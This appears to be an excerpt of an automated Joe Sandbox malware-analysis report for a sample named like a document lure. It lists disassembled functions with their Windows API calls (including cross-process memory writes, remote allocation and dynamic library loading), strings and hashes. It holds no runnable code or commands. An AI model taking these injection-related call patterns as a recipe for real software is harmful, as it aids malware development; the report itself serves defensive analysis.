                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: 9b96844fe8b6b09f4ad6690b445d3128e1235a2673f7f8b6ecf46359cbd42274
                                                        • Instruction ID: 89ea74273123c5a87fe06ce512553db104c4f50ac4f4ae30f1a6475c0b695d48
                                                        • Opcode Fuzzy Hash: 9b96844fe8b6b09f4ad6690b445d3128e1235a2673f7f8b6ecf46359cbd42274
                                                        • Instruction Fuzzy Hash: 93A15775604301DFC710DF14C884D9ABBE5BF88320F148999F89A9B3A2CB79ED49CB91
                                                        Function 0072DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$+
                                                        • API String ID: 0-2552117581
                                                        • Opcode ID: 1043867cc9f9d80f8167ac2fec6eccb62d7380b33ddb253f92cff9614ada7480
                                                        • Instruction ID: a8b49084683b13fd6c83d9ccccb68be5455224c5401318dca5d58a76bbb48472
                                                        • Opcode Fuzzy Hash: 1043867cc9f9d80f8167ac2fec6eccb62d7380b33ddb253f92cff9614ada7480
                                                        • Instruction Fuzzy Hash: 15512175048266DFDF25EF68D455AFA7BA4BF2A310F144055F881AB2D0D7BC9C42C760
                                                        Function 0075503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,007ADC40,?,0000000F,0000000C,00000016,007ADC40,?), ref: 0075507B
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                          • Part of subcall function 0071B8A7: _memmove.LIBCMT ref: 0071B8FB
                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007550FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                        • String ID: REMOVE$THIS
                                                        • API String ID: 2528338962-776492005
                                                        • Opcode ID: 704e5a41a62b017dfb226ad9f601f148b6ee1a509916e8ee397df9e8cde6778f
                                                        • Instruction ID: fabdd2684dfe04c1e244ad26ec624f819a1e99f8f4159218e5c58351a49dc661
                                                        • Opcode Fuzzy Hash: 704e5a41a62b017dfb226ad9f601f148b6ee1a509916e8ee397df9e8cde6778f
                                                        • Instruction Fuzzy Hash: 9D418134A00A09DFCF14DF68C895AEEBBB5BF48305F048069E856AB392DB789D45CB51
                                                        Function 0074CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00754D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0074C9FE,?,?,00000034,00000800,?,00000034), ref: 00754D6B
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0074CFC9
                                                          • Part of subcall function 00754D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0074CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00754D36
                                                          • Part of subcall function 00754C65: GetWindowThreadProcessId.USER32(?,?), ref: 00754C90
                                                          • Part of subcall function 00754C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0074C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00754CA0
                                                          • Part of subcall function 00754C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0074C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00754CB6
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0074D036
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0074D083
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: 2f16fb5466bf0dabbca9a343d23cd7112b8e68a1c8e7b46c47583778ea6bfe79
                                                        • Instruction ID: 05ba120b36ecc90a5221e64aedbbfd1839faa9d1402e024b9498ec5c13dd9f7f
                                                        • Opcode Fuzzy Hash: 2f16fb5466bf0dabbca9a343d23cd7112b8e68a1c8e7b46c47583778ea6bfe79
                                                        • Instruction Fuzzy Hash: DA412C72A00218AEDB10DFA4CC85ADEB7B8AF49700F108095EA45B7191DB756E89CB61
                                                        Function 0077A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007ADBF0,00000000,?,?,?,?), ref: 0077A4E6
                                                        • GetWindowLongW.USER32 ref: 0077A503
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0077A513
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: c18b603e612afb93b112c76a8cf05930659719a00a3013e3ba88851d76926d42
                                                        • Instruction ID: 03a98cbb43b6fa3e38a922f6dc158dd194cbb996845dee949efe9bfd008273db
                                                        • Opcode Fuzzy Hash: c18b603e612afb93b112c76a8cf05930659719a00a3013e3ba88851d76926d42
                                                        • Instruction Fuzzy Hash: A431A231200645BBEF218E78CC45BEA7769EB89364F208715F879922E0D779E8619B60
                                                        Function 007657D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 007657E7
                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0076581D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CrackInternet_memset
                                                        • String ID: ?Kv$|
                                                        • API String ID: 1413715105-1365364517
                                                        • Opcode ID: aec214edcf99a93aedfcddfdd933d3ba35edf63dd9a3cf2824e4a325646dd535
                                                        • Instruction ID: 3eeff5ba5a6f218d4ca91756d8592940666e29b9be86d151a78b039d7ef37dc3
                                                        • Opcode Fuzzy Hash: aec214edcf99a93aedfcddfdd933d3ba35edf63dd9a3cf2824e4a325646dd535
                                                        • Instruction Fuzzy Hash: 93311B7180011DEBCF11AFA4DC95EEEBFB9FF18310F104015F816A6162DB359A86DBA1
                                                        Function 0077A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0077A74F
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0077A75D
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0077A764
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: 2ed298aad6eb1a1e38e3bb70702c1362376d7213911a70434f70c1ef9eef7a3e
                                                        • Instruction ID: 46c90a77a97faea7f0d6f6c33ced6268c833ab08b23884965d9f3fd6456ce5cc
                                                        • Opcode Fuzzy Hash: 2ed298aad6eb1a1e38e3bb70702c1362376d7213911a70434f70c1ef9eef7a3e
                                                        • Instruction Fuzzy Hash: 032181B5600205BFEB14DF64DCC5EAB37BDEB493A8B044059FA0597251C774EC11DBA1
                                                        Function 007797B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0077983D
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0077984D
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00779872
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 595c7f7829b32dfe5847fe996b7c642486c86c7481980136bfc19f631a7ee633
                                                        • Instruction ID: d4774808a5b1479561e4053da2332f38b8d8b0fbe5df27af7faca310ad27e4e9
                                                        • Opcode Fuzzy Hash: 595c7f7829b32dfe5847fe996b7c642486c86c7481980136bfc19f631a7ee633
                                                        • Instruction Fuzzy Hash: 7B21C531611118BFDF158F54CC85FAB3BAAEF89794F11C125FA085B190C6799C5287A0
                                                        Function 0077A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0077A27B
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0077A290
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0077A29D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: 5264b7296bbb624508843ebbcb2a4fa972c27fe93b3814304d7aa4b2acdb30a1
                                                        • Instruction ID: 5463c28c00c2227e2dc27f7562b927cb071ae81140310d8ea32a9ff2efcf3ea9
                                                        • Opcode Fuzzy Hash: 5264b7296bbb624508843ebbcb2a4fa972c27fe93b3814304d7aa4b2acdb30a1
                                                        • Instruction Fuzzy Hash: 4211E771200308BAEF205F65CC46FAB3B68FFC9B94F128118FA45A6091D276A851DB60
                                                        Function 00732F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00732F79
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00732F80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RoInitialize$combase.dll
                                                        • API String ID: 2574300362-340411864
                                                        • Opcode ID: ad07d32d238b9c6d0c50a48cf6b404505990e199b64528bc909bd3d7d54dd298
                                                        • Instruction ID: 94933820c3b3d51a17632b146850ca4a899432ace1c68a875276e7a0a1a5796f
                                                        • Opcode Fuzzy Hash: ad07d32d238b9c6d0c50a48cf6b404505990e199b64528bc909bd3d7d54dd298
                                                        • Instruction Fuzzy Hash: 14E01A70695309AAEF606FB0ED49B193775F704B46F00D026B102D10A0DBBE4851DF4C
                                                        Function 00733034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00732F4E), ref: 0073304E
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00733055
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 2574300362-2819208100
                                                        • Opcode ID: 51d2dd19d66e966e1d99ea0a207616c810fbfa9f2b26c04efe6a7e7501c62656
                                                        • Instruction ID: fd446534654ecc3695c0ea18a780ef378f195d361888774fa330d63ddf300e8b
                                                        • Opcode Fuzzy Hash: 51d2dd19d66e966e1d99ea0a207616c810fbfa9f2b26c04efe6a7e7501c62656
                                                        • Instruction Fuzzy Hash: D6E0B6B0686309ABEB305F61FE0DB193B75B704746F10902AF109D20B0EBBE89508B5C
                                                        Function 0078BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: 49549a032272fd8ffc3ad708b68c6b7be92a3436fd7d30e36d5a011fb9dc2af8
                                                        • Instruction ID: f541cbe8ffe61e86fb243f3093a14420814f74ee4ae721512232a2de3597f654
                                                        • Opcode Fuzzy Hash: 49549a032272fd8ffc3ad708b68c6b7be92a3436fd7d30e36d5a011fb9dc2af8
                                                        • Instruction Fuzzy Hash: 03E0627188812CEACB58E7909D569BA737CBB04700F54C497B916D1045D73D9B54AB13
                                                        Function 007720F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007720EC,?,007722E0), ref: 00772104
                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00772116
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetProcessId$kernel32.dll
                                                        • API String ID: 2574300362-399901964
                                                        • Opcode ID: 83344a4b78c9ef2b0aeae18aa61ed9ee4c8e04fe79aca5e8fb12ed95adba46ba
                                                        • Instruction ID: 6f73bc6b631da317ff2dce3837bd776c85a22868a379b87005d57a38369af7c4
                                                        • Opcode Fuzzy Hash: 83344a4b78c9ef2b0aeae18aa61ed9ee4c8e04fe79aca5e8fb12ed95adba46ba
                                                        • Instruction Fuzzy Hash: 1CD0A7755403169FDB306F60F80DB4237D5BB04300B11C81EE75DD2256D77CC882CA14
                                                        Function 0072E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0072E6D9,?,0072E55B,007ADC28,?,?), ref: 0072E6F1
                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0072E703
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: IsWow64Process$kernel32.dll
                                                        • API String ID: 2574300362-3024904723
                                                        • Opcode ID: 8d3deef1624b61439a11214b42ed73757fc0be80c9dcd71edebf31a965693f4f
                                                        • Instruction ID: 3b51b84856222bf504b8aad1ef4fc0126d14a0f1cd604ddd3ad4f73b56ec98c3
                                                        • Opcode Fuzzy Hash: 8d3deef1624b61439a11214b42ed73757fc0be80c9dcd71edebf31a965693f4f
                                                        • Instruction Fuzzy Hash: EAD052B54403228AD7302B24FC4CA833BE9AB04300B11842EE495A2262DAB8C8828A14
                                                        Function 0072E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0072E69C,74DF0AE0,0072E5AC,007ADC28,?,?), ref: 0072E6B4
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0072E6C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
